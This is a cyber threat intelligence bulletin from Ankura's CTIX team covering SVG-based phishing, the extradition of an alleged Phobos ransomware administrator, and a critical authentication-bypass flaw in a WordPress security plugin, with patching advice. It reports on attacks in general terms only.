Malware Activity
SVG Attachments Increasingly Popular in Phishing Attacks
Cybersecurity researchers have found that Scalable Vector Graphics (SVG) attachments are becoming an increasingly popular way for threat actors to deliver malware or send phishing forms while evading detection. SVG files display images via code instead of using pixels, allowing the vector images to automatically resize without losing quality in different resolutions. SVG files have been used before by threat actors, notably to distribute Qbot malware via HTML smuggling. In recent campaigns, researchers have observed SVG files that display HTML and execute JavaScript, crafted to display phishing forms which can send victims’ inputs back to the attacker. SVG attachments can also embed links that when clicked lead to a malware site or use JavaScript to automatically redirect browsers to malicious sites. Due to the nature of SVG files, they can more easily evade detection from security software than other file types. Luckily, SVG files are not commonly used in business, and organizations may choose to block all emails containing an SVG attachment by policy. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
Threat Actor Activity
Alleged Administrator of Phobos Ransomware Service Extradited from South Korea to US
Evgenii Ptitsyn, a Russian national suspected of being an administrator of the Phobos ransomware operation, has been extradited from South Korea to face charges in the United States. Phobos, a ransomware-as-a-service (RaaS) model derived from the Crysis ransomware family, has been responsible for attacks on over one thousand (1,000) entities globally, resulting in over $16 million in ransom payments. The operation involved selling access to ransomware payloads on the dark web, with targets including schools, hospitals, and small businesses. Ptitsyn, allegedly using the online aliases "derxan" and "zimmermanx," is charged with wire fraud, conspiracy to commit computer fraud, and extortion related to hacking. Each ransomware deployment was uniquely identified, linking it to corresponding decryption keys and payments directed to specific cryptocurrency wallets. From December 2021 to April 2024, decryption fees collected by affiliates were transferred to a wallet controlled by Ptitsyn. If convicted, he faces significant prison sentences up to twenty (20) years for each wire fraud count, ten (10) years for each hacking count, and five (5) years for conspiracy charges. Phobos affiliates often utilized "spray and pray" tactics, aiming ransomware at numerous potential targets in hopes of infection. Their ransom demands were relatively small, often under $2,000, increasing the likelihood of payment. Despite the lower technical proficiency of affiliates compared to other ransomware groups, Phobos maintained a structured operation, closely monitoring affiliate performance. Recent trends point to law enforcement efforts prioritizing dismantling ransomware networks. The reduction in Phobos activity following Ptitsyn's arrest suggests a direct impact on the group's operations, signaling progress in curbing such cyber threats.
Vulnerabilities
WordPress Plugin Vulnerability Exposes Administrative Access in 2FA-Enabled Devices
A critical vulnerability identified in the WordPress plugin 'Really Simple Security' (formerly 'Really Simple SSL') has exposed over four million websites to potential full administrative takeover. The flaw, tracked as CVE-2024-10924 and rated with a critical CVSS score of 9.8, affects both the free and premium versions of the plugin. It stems from improper handling of user authentication in the plugin's two-factor REST API actions, particularly within the 'check_login_and_get_user()' function. This flaw allows unauthorized attackers to gain administrative access when two-factor authentication (2FA) is enabled, posing a significant risk to affected sites. Discovered by Wordfence on November 6, 2024, the vulnerability can be exploited using automated scripts, potentially leading to widespread attacks across numerous WordPress sites. The exploit involves bypassing authentication checks, which, when combined with the plugin's popularity, makes it an attractive target for large-scale automated attacks. The issue was quickly addressed with the release of version 9.1.2 of the plugin, which fixes the improper handling of 'login_nonce' verification. Wordfence, in coordination with the plugin's developers and WordPress[.]org, initiated a forced security update for all sites using the plugin. However, it's crucial for website administrators to verify that their sites have been updated to the latest patched version, especially since auto-updates may not function for users with expired licenses. As a precaution, CTIX analysts advise administrators to confirm their plugin version and update immediately to mitigate the risk of site compromise.
- Bleeping Computer: WordPress Plugin Article
- Dark Reading: WordPress Plugin Article
- The Hacker News: WordPress Plugin Article
The semi-weekly Ankura Cyber Threat Investigations and Expert Services (CTIX) FLASH Update is designed to provide timely and relevant cyber intelligence about current or emerging cyber events. The preceding is a collection of cyber threat intelligence leads assembled over the past few days and typically includes high-level intelligence about recent threat group/actor activity and newly identified vulnerabilities impacting a wide range of industries and victims. Please feel free to contact the CTIX Team (ctix@ankura.com) if you need more context.
© Copyright 2024. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice
